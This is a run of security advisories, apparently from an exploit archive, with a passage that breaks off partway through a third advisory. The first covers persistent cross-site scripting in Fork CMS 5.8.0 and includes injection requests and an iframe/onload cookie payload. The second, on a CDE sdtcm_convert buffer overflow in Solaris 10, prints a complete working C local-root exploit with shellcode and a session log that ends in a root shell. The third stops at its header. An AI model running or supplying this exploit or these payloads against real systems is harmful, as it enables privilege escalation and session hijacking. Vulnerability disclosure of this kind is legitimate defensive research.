
Fork CMS 5.8.0 Script Insertion


Fork CMS version 5.8.0 suffers from multiple script insertion vulnerabilities.


MD5 | dfb517111cdf0aff3b7e55c11f81a72e

Document Title:
===============
Fork CMS v5.8.0 - Multiple Persistent Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2208

ID (3073): https://github.com/forkcms/forkcms/pull/3073


Release Date:
=============
2020-04-17


Vulnerability Laboratory ID (VL-ID):
====================================
2208


Common Vulnerability Scoring System:
====================================
5.3


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Fork is an easy to use open source CMS using Symfony Components. Fork CMS is
dedicated to creating a user friendly environment to build, monitor and update
your website. We take great pride in being the Content Management System of
choice for beginners and professionals.

(Copy of the Homepage: https://www.fork-cms.com &
https://www.fork-cms.com/download )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent web vulnerabilities in the official Fork CMS v5.8.0.


Affected Product(s):
====================
ForkCMS
Product: Fork CMS v5.8.0 - Content Management System (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2020-04-17: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities have been
discovered in the official Fork CMS v5.8.0 open-source web application.
The vulnerabilities allow remote attackers to inject their own malicious
script code with a persistent attack vector, compromising browser-to-
web-application requests from the application side.

The persistent input validation web vulnerabilities are located in the
`Displayname` input field of the `Add`, `Edit` and `Register` mechanisms,
which forward the value into the `var` parameter. Remote attackers and
privileged application user accounts are able to inject their own
malicious persistent script code as the user's display name through the
registration module (/profiles/register). Privileged users with access to
the profile or users module are able to exploit the issue with a simple
injection. The display name then becomes visible in the Admin - Profiles
Index on Preview, in Edit User/Profile, in the Delete User interaction and
in the User Index listing modules. The `var` parameter does not encode or
parse the injected content, so the browser executes it. The request method
used to inject is POST and the attack vector of the vulnerability is located
on the application side of the content management system. The injection
point is located in the registration form and in the add/edit user
function. The execution point occurs in the preview profile, edit user,
user index listing and delete user message contexts.

Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external redirects to
malicious sources and persistent manipulation of affected application
modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Register
[+] Add User
[+] Edit User

Vulnerable Input(s):
[+] Displayname

Vulnerable Parameter(s):
[+] var

Affected Module(s):
[+] Preview Profile
[+] Edit User
[+] User Index
[+] Delete User


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by
remote attackers with a low-privileged user account and low user interaction.
For security demonstration or to reproduce the security vulnerability,
follow the information and steps provided below.


Manual steps to reproduce the vulnerability ...
1. Open the Fork CMS web application (newest version)
2. Move via the sitemap or by link to the registration page
(/modules/profiles/register)
3. Inject your html/js script code payload into the Displayname input field
4. Register the account by pushing submit
5. Activate the link in the account registration email
Note: Now simply wait until the administrator / privileged user visits
the panel to execute the code on interaction or preview only
6. Successful reproduction of the persistent script code injection
vulnerability!


PoC: Vulnerable Source (User Index in Listing -
https://fork-cms.localhost:8080/private/en/users/index)
<tr id="row-2" class="even">
<td class="nickname"><a
href="/private/en/users/edit?token=k7byefqor8&id=2"
title="edit">test3"><iframe src="evil.source"
onload=alert(document.cookie)></a></td>
<td class="fork-data-grid-action actionEdit"><a
href="/private/en/users/edit?token=k7byefqor8&id=2"
class="btn btn-default btn-xs pull-right">
<span class="fa fa-pencil" aria-hidden="true"></span>&nbsp;Edit</a></td>
</tr>


PoC: Vulnerable Source (Profiles Index on Preview -
https://fork-cms.localhost:8080/private/en/profiles/index)
<tbody><tr id="row-1" class="odd">
<td class="check"><input type="checkbox" name="id[]" value="1"
class="inputCheckbox checkBeforeUnload"></td>
<td class="email"><a
href="/private/en/profiles/edit?token=k7byefqor8&id=1"
title="">tester23@protonmail.com</a></td>
<td class="display_name">"<iframe src="evil.source"
onload="alert(document.cookie)"></td>
<td class="registered_on">13 April 2020 11:17</td>
<td class="fork-data-grid-action actionEdit">
<a href="/private/en/profiles/edit?token=k7byefqor8&id=1" class="btn
btn-default btn-xs pull-right">
<span class="fa fa-pencil" aria-hidden="true"></span>&nbsp;Edit</a></td>
</tr></tbody>


PoC: Vulnerable Source (Delete User - On Interaction)
<form name="delete" method="post"
action="/private/en/users/delete?token=k7byefqor8">
<input type="hidden" id="delete__token" name="delete[_token]"
value="q3ADogMObka_-73n5afnMPsJHj9ZAI_ch5uiabqDsqs" />
<input type="hidden" id="delete_id" name="delete[id]" value="2" />
<div class="modal fade" id="confirmDelete" role="dialog" tabindex="-1"
aria-hidden="true" aria-labelledby="confirmDeleteTitle">
<div class="modal-dialog"><div class="modal-content"><div
class="modal-header">
<h4 class="modal-title" id="confirmDeleteTitle">Delete</h4></div>
<div class="modal-body">
<p>Are your sure you want to delete the user "evil.source"><iframe
src=evil.source onload=alert(document.cookie)>"?</p></div>
<div class="modal-footer">
<button class="btn btn-default" title="Cancel" data-dismiss="modal">
<span class="fa fa-times" aria-hidden="true"></span>
<span class="btn-text">Cancel</span></button>
<button class="btn btn-danger" title="Delete">
<span class="fa fa-trash" aria-hidden="true"></span>
<span class="btn-text">Delete</span>
</button></div></div></div></div>
</form>


--- PoC Session Logs [POST] (Registration User Account) ---
https://fork-cms.localhost:8080/en/modules/profiles/register#registerForm
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://fork-cms.localhost:8080/en/modules/profiles/register
Content-Type: application/x-www-form-urlencoded
Content-Length: 179
Origin: https://fork-cms.localhost:8080
Connection: keep-alive
Cookie:
track=s%3A32%3A%229739044e17a322bae65870698df9b79e%22%3B;PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d;

interface_language=en; frontend_language=en; cookie_bar_agree=Y;
cookie_bar_hide=Y;
form=register&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&display_name=>"<iframe
src=evil.source
onload=alert(document.cookie)>&email=tester23@protonmail.com&password=pwnd
-
POST: HTTP/1.1 302 Found
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: frontend_language=en; expires=Wed, 13-May-2020 09:49:57 GMT;
Max-Age=2592000;
path=/; domain=.fork-cms.localhost:8080; httponly; samesite=lax
track=s%3A32%3A%229739044e17a322bae65870698df9b79e%22%3B; expires=Tue,
13-Apr-2021 09:49:57 GMT;
Max-Age=31536000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Location: https://fork-cms.localhost:8080
X-server: fork01


--- PoC Session Logs [POST] (Add User) ---
https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
Content-Type: multipart/form-data;
boundary=---------------------------56051791419552543783889366402
Content-Length: 2545
Origin: https://fork-cms.localhost:8080
Connection: keep-alive
Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
Upgrade-Insecure-Requests: 1
form=add&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&email=tester232323@protonmail.com&password=tester445
&confirm_password=tester445&name=test1&surname=test2&nickname=test3>"<iframe
src=a onload=alert(document.cookie)>&avatar=
&interface_language=en&preferred_editor=ck-editor&date_format=j F
Y&time_format=H:i&number_format=dot_nothing
&csv_split_character=;&csv_line_ending=n&active=1&groups[]=1&add=
-
POST: HTTP/1.1 302 Found
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Location:
/private/en/users/index?token=k7byefqor8&report=added&var=test3>"<iframe
src=evil.source onload=alert(document.cookie)>&highlight=row-4
X-server: fork01
-
https://fork-cms.localhost:8080/private/en/users/index?token=k7byefqor8&report=added&var=test3>"<iframe
src=evil.source onload=alert(document.cookie)>&highlight=row-4
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
Connection: keep-alive
Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
-
POST: HTTP/1.1 200 OK
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Content-Length: 3615
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Vary: Accept-Encoding
Content-Encoding: gzip
X-server: fork01
-
GET: HTTP/1.1 200 OK
Server: nginx/1.6.2
https://fork-cms.localhost:8080/private/en/users/evil.source
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Location: /private/en/error?type=action-not-allowed
X-server: fork01


--- PoC Session Logs [POST] (Edit User) ---
https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
Content-Type: multipart/form-data;
boundary=---------------------------388544425912514902093103180709
Content-Length: 2563
Origin: https://fork-cms.localhost:8080
Connection: keep-alive
Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
form=edit&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&email=testemail337@protonmail.com&name=test1&surname=test2
&nickname=test3>"<iframe src=evil.source
onload=alert(document.cookie)>&avatar=&new_password=&confirm_password=
&interface_language=en&preferred_editor=ck-editor&date_format=j F
Y&time_format=H:i&number_format=dot_nothing&
csv_split_character=;&csv_line_ending=n&active=1&groups[]=1&edit=
-
POST: HTTP/1.1 302 Found
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:34:55
GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Location:
/private/en/users/index?token=k7byefqor8&report=edited&var=test3>"<iframe src=evil.source
onload=alert(document.cookie)>&highlight=row-2
X-server: fork01
https://fork-cms.localhost:8080/private/en/users/index?token=k7byefqor8&report=edited&var=test3>"<iframe
src=evil.source onload=alert(document.cookie)>&highlight=row-2
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
Connection: keep-alive
Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
-
POST: HTTP/1.1 200 OK
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Content-Length: 3585
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:34:55 GMT;
Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Vary: Accept-Encoding
Content-Encoding: gzip
X-server: fork01


Reference(s):
https://fork-cms.localhost:8080/en/modules/profiles/register
https://fork-cms.localhost:8080/private/en/profiles/index
https://fork-cms.localhost:8080/private/en/users/index
https://fork-cms.localhost:8080/private/en/users/edit
https://fork-cms.localhost:8080/private/en/users/add


Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities
in the Fork CMS web application is estimated as high.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website are trademarks of the vulnerability-lab team and
the specific authors or managers. To record, list, modify, use or
edit our material, contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


Common Desktop Environment 1.6 Local Privilege Escalation


A buffer overflow in the _SanityCheck() function in the Common Desktop Environment version distributed with Oracle Solaris 10 1/13 (Update 11) and earlier allows local users to gain root privileges via a long calendar name or calendar owner passed to sdtcm_convert in a malicious calendar file. The open source version of CDE (based on the CDE 2.x codebase) is not affected, because it does not ship the vulnerable program. Versions 1.6 and below are affected.


MD5 | a52155188d9d9476faa2c94dc62f2069

@Mediaservice.net Security Advisory #2020-05 (last updated on 2020-04-15)

Title: Local privilege escalation via CDE sdtcm_convert
Application: Common Desktop Environment 1.6 and earlier
Platforms: Oracle Solaris 10 1/13 (Update 11) and earlier
Other platforms are potentially affected (see below)
Description: A local attacker can gain root privileges by exploiting a
buffer overflow in CDE sdtcm_convert
Author: Marco Ivaldi <marco.ivaldi@mediaservice.net>
Vendor Status: Oracle <secalert_us@oracle.com> notified on 2019-12-08
CERT/CC notified on 2019-12-09 (tracking VU#308289)
CVE Name: CVE-2020-2944
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (Base Score: 8.8)
References: https://github.com/0xdea/advisories/blob/master/2020-05-cde-sdtcm_convert.txt
https://www.oracle.com/security-alerts/cpuapr2020.html
https://www.oracle.com/technetwork/server-storage/solaris10/
https://www.mediaservice.net/
https://0xdeadbeef.info/

1. Abstract.

A buffer overflow in the _SanityCheck() function in the Common Desktop
Environment version distributed with Oracle Solaris 10 1/13 (Update 11) and
earlier allows local users to gain root privileges via a long calendar name or
calendar owner passed to sdtcm_convert in a malicious calendar file.

The open source version of CDE (based on the CDE 2.x codebase) is not affected,
because it does not ship the vulnerable program.

2. Example Attack Session.

bash-3.2$ cat /etc/release
Oracle Solaris 10 1/13 s10x_u11wos_24a X86
Copyright (c) 1983, 2013, Oracle and/or its affiliates. All rights reserved.
Assembled 17 January 2013
bash-3.2$ uname -a
SunOS nostalgia 5.10 Generic_147148-26 i86pc i386 i86pc
bash-3.2$ id
uid=54322(raptor) gid=1(other)
bash-3.2$ gcc raptor_sdtcm_conv.c -o raptor_sdtcm_conv -Wall
bash-3.2$ ./raptor_sdtcm_conv
raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel
Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>

Using SI_PLATFORM : i86pc (5.10)
Using SI_HOSTNAME : nostalgia
Using stack base : 0x8047fff
Using rwx_mem address : 0xfeffa004
Using payload address : 0x8047dff
Using strcpy() address : 0xfefe26a0

Preparing the evil calendar file... Done.
Exploiting... Please answer "n" when prompted.
Loading the calendar ...
[...]
Do you want to correct it? (Y/N) [Y] n
# id
uid=0(root) gid=1(other) egid=12(daemon)

3. Affected Platforms.

All platforms shipping the Common Desktop Environment based on the CDE 1.x
codebase are potentially affected. This includes:

* Oracle Solaris 10 1/13 (Update 11) and earlier [default installation]

The open source version of CDE (based on the CDE 2.x codebase) is not affected,
because it does not ship the vulnerable program.

4. Fix.

Oracle has assigned the tracking# S1239395 and has released a fix for all
affected and supported versions of Solaris in the Critical Patch Update (CPU)
of April 2020.

As a workaround, it is also possible to remove the setuid bit from the
vulnerable executable as follows (note that this might prevent it from working
properly):

bash-3.2# chmod -s /usr/dt/bin/sdtcm_convert

Please note that during the audit many other potentially exploitable bugs have
surfaced in sdtcm_convert and in the Common Desktop Environment in general.
Therefore, removing the setuid bit from all CDE binaries is recommended,
regardless of patches released by vendors.

5. Proof of Concept.

An exploit for Oracle Solaris 10 1/13 (Update 11) Intel has been developed as a
proof of concept. It can be downloaded from:

https://github.com/0xdea/exploits/blob/master/solaris/raptor_sdtcm_conv.c

raptor_sdtcm_conv.c proof of concept:

/*
 * raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel
 * Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * A buffer overflow in the _SanityCheck() function in the Common Desktop
 * Environment version distributed with Oracle Solaris 10 1/13 (Update 11) and
 * earlier allows local users to gain root privileges via a long calendar name
 * or calendar owner passed to sdtcm_convert in a malicious calendar file
 * (CVE-2020-2944).
 *
 * The open source version of CDE (based on the CDE 2.x codebase) is not
 * affected, because it does not ship the vulnerable binary.
 *
 * "CDE, the gift that keeps on giving" -- @0xdea
 * "Feels more like a curse you can't break from this side." -- @alanc
 *
 * This exploit uses the ret-into-ld.so technique to bypass the non-exec stack
 * protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory
 * space, try returning to sprintf() instead of strcpy().
 *
 * I haven't written a Solaris/SPARC version because I don't have a SPARC box
 * on which Solaris 10 can run. If anybody is kind enough to give me access to
 * such a box, I'd be happy to port my exploit to Solaris/SPARC as well.
 *
 * Usage:
 * $ gcc raptor_sdtcm_conv.c -o raptor_sdtcm_conv -Wall
 * $ ./raptor_sdtcm_conv
 * [...]
 * Do you want to correct it? (Y/N) [Y] n
 * # id
 * uid=0(root) gid=1(other) egid=12(daemon)
 * #
 *
 * This should work with any common configuration on the first try. To
 * re-enable rpc.cmsd, clear its service maintenance status by running the
 * following commands as root:
 * # /usr/sbin/svcadm clear cde-calendar-manager
 * # /usr/bin/svcs -a | grep calendar
 * online         13:16:54 svc:/network/rpc/cde-calendar-manager:default
 *
 * Tested on:
 * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
 * [previous Solaris versions are also likely vulnerable]
 */

#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>
#include <sys/types.h>

#define INFO1	"raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel"
#define INFO2	"Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>"

#define VULN	"/usr/dt/bin/sdtcm_convert"	// the vulnerable program
#define ADMIN	"/usr/dt/bin/sdtcm_admin"	// calendar admin utility
#define BUFSIZE	2304				// size of the name/owner
#define PAYSIZE	1024				// size of the payload
#define OFFSET	env_len / 2			// offset to the shellcode

char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
/* double setuid() */
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
/* execve() */
"\x31\xc0\x50\x68/ksh\x68/bin"
"\x89\xe3\x50\x53\x89\xe2\x50"
"\x52\x53\xb0\x3b\x50\xcd\x91";

/* globals */
char	*env[256];
int	env_pos = 0, env_len = 0;

/* prototypes */
int	add_env(char *string);
void	check_zero(int addr, char *pattern);
int	search_ldso(char *sym);
int	search_rwx_mem(void);
void	set_val(char *buf, int pos, int val);

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf[BUFSIZE], payload[PAYSIZE];
	char	platform[256], release[256], hostname[256];
	int	i, payaddr;

	char	*arg[3] = {"foo", "hax0r", NULL};
	int	sb = ((int)argv[0] | 0xfff);	/* stack base */
	int	ret = search_ldso("strcpy");	/* or sprintf */
	int	rwx_mem = search_rwx_mem();	/* rwx memory */

	char	cmd[1024];
	FILE	*fp;

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* read command line */
	if (argc != 1) {
		fprintf(stderr, "Usage:\n%s\n[...]\n", argv[0]);
		fprintf(stderr, "Do you want to correct it? (Y/N) [Y] n\n\n");
		exit(1);
	}

	/* get system information */
	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
	sysinfo(SI_HOSTNAME, hostname, sizeof(hostname) - 1);

	/* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */
	memset(payload, '\x90', PAYSIZE);
	payload[PAYSIZE - 1] = 0x0;
	memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc));

	/* fill the envp, keeping padding */
	add_env(payload);
	add_env("HOME=/tmp");
	add_env(NULL);

	/* calculate the payload address */
	payaddr = sb - OFFSET;

	/* prepare the evil palette name */
	memset(buf, 'A', sizeof(buf));
	buf[sizeof(buf) - 1] = 0x0;

	/* fill with function address in ld.so.1, saved eip, and arguments */
	for (i = 0; i < BUFSIZE - 16; i += 4) {
		set_val(buf, i, ret);		/* strcpy */
		set_val(buf, i += 4, rwx_mem);	/* saved eip */
		set_val(buf, i += 4, rwx_mem);	/* 1st argument */
		set_val(buf, i += 4, payaddr);	/* 2nd argument */
	}

	/* print some output */
	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
	fprintf(stderr, "Using SI_HOSTNAME\t: %s\n", hostname);
	fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
	fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
	fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr);
	fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);

	/* create the evil calendar file */
	fprintf(stderr, "Preparing the evil calendar file... ");
	snprintf(cmd, sizeof(cmd), "%s -a -c hax0r@%s", ADMIN, hostname);
	if (system(cmd) == -1) {
		perror("Error creating calendar file");
		exit(1);
	}
	if (chmod("/usr/spool/calendar/callog.hax0r", 0660) == -1) {
		perror("Error creating calendar file");
		exit(1);
	}

	/* prepare the evil calendar file (badchars currently not handled) */
	fp = fopen("/usr/spool/calendar/callog.hax0r", "w");
	if (!fp) {
		perror("Error preparing calendar file");
		exit(1);
	}
	fprintf(fp, "Version: 4\n(calendarattributes "
		"(\"-//XAPIA/CSA/CALATTR//NONSGML Access List//EN\","
		"\"10:access_list\",\"world:2\")\n");
	/* buffer overflow in calendar name */
	fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\","
		"\"5:string\",\"%s\")\n", buf);
	fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\","
		"\"6:user\",\"fnord\")\n)");
	/* buffer overflow in calendar owner */
	/*
	fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\","
		"\"5:string\",\"hax0r\")\n");
	fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\","
		"\"6:user\",\"%s\")\n)", buf);
	*/
	fclose(fp);

	fprintf(stderr, "Done.\n");

	/* run the vulnerable program */
	fprintf(stderr, "Exploiting... Please answer \"n\" when prompted.\n");
	execve(VULN, arg, env);
	perror("execve");
	exit(0);
}

/*
 * add_env(): add a variable to envp and pad if needed
 */
int add_env(char *string)
{
	int	i;

	/* null termination */
	if (!string) {
		env[env_pos] = NULL;
		return env_len;
	}

	/* add the variable to envp */
	env[env_pos] = string;
	env_len += strlen(string) + 1;
	env_pos++;

	/* pad the envp using zeroes */
	if ((strlen(string) + 1) % 4)
		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
			env[env_pos] = string + strlen(string);
			env_len++;
		}

	return env_len;
}

/*
 * check_zero(): check an address for the presence of a 0x00
 */
void check_zero(int addr, char *pattern)
{
	if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
	    !(addr & 0xff000000)) {
		fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
		exit(1);
	}
}

/*
 * search_ldso(): search for a symbol inside ld.so.1
 */
int search_ldso(char *sym)
{
	int		addr;
	void		*handle;
	Link_map	*lm;

	/* open the executable object file */
	if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
		perror("dlopen");
		exit(1);
	}

	/* get dynamic load information */
	if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
		perror("dlinfo");
		exit(1);
	}

	/* search for the address of the symbol */
	if ((addr = (int)dlsym(handle, sym)) == NULL) {
		fprintf(stderr, "Sorry, function %s() not found\n", sym);
		exit(1);
	}

	/* close the executable object file */
	dlclose(handle);

	check_zero(addr - 4, sym);
	return addr;
}

/*
 * search_rwx_mem(): search for an RWX memory segment valid for all
 * programs (typically, /usr/lib/ld.so.1) using the proc filesystem
 */
int search_rwx_mem(void)
{
	int	fd;
	char	tmp[16];
	prmap_t	map;
	int	addr = 0, addr_old;

	/* open the proc filesystem */
	sprintf(tmp,"/proc/%d/map", (int)getpid());
	if ((fd = open(tmp, O_RDONLY)) < 0) {
		fprintf(stderr, "Can't open %s\n", tmp);
		exit(1);
	}

	/* search for the last RWX memory segment before stack (last - 1) */
	while (read(fd, &map, sizeof(map)))
		if (map.pr_vaddr)
			if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
				addr_old = addr;
				addr = map.pr_vaddr;
			}
	close(fd);

	/* add 4 to the exact address NULL bytes */
	if (!(addr_old & 0xff))
		addr_old |= 0x04;
	if (!(addr_old & 0xff00))
		addr_old |= 0x0400;

	return addr_old;
}

/*
 * set_val(): copy a dword inside a buffer (little endian)
 */
void set_val(char *buf, int pos, int val)
{
	buf[pos] = 	(val & 0x000000ff);
	buf[pos + 1] =	(val & 0x0000ff00) >> 8;
	buf[pos + 2] =	(val & 0x00ff0000) >> 16;
	buf[pos + 3] =	(val & 0xff000000) >> 24;
}


Copyright (c) 2020 Marco Ivaldi and @Mediaservice.net. All rights reserved.





Common Desktop Environment 2.3.1 / 1.6 libDtSvc Buffer Overflow


A difficult to exploit stack-based buffer overflow in the _DtCreateDtDirs() function in the Common Desktop Environment version distributed with Oracle Solaris 10 1/13 (Update 11) and earlier may allow local users to corrupt memory and potentially execute arbitrary code in order to escalate privileges via a long X11 display name. The vulnerable function is located in the libDtSvc library and can be reached by executing the setuid program dtsession. Versions 2.3.1 and below as well as 1.6 and earlier are affected.


MD5 | c7348e1fb04cdcfdbe4ecfb089b5825b

@Mediaservice.net Security Advisory #2020-06 (last updated on 2020-04-15)

Title: Stack-based buffer overflow in CDE libDtSvc
Application: Common Desktop Environment 2.3.1 and earlier
Common Desktop Environment 1.6 and earlier
Platforms: Oracle Solaris 10 1/13 (Update 11) and earlier
Other platforms are potentially affected (see below)
Description: A difficult to exploit stack-based buffer overflow in the
libDtSvc library distributed with CDE may allow local users to
corrupt memory and potentially execute arbitrary code in order
to escalate privileges
Author: Marco Ivaldi <marco.ivaldi@mediaservice.net>
Vendor Status: Oracle <secalert_us@oracle.com> notified on 2019-12-15
CERT/CC notified on 2019-12-15 (tracking VU#308289)
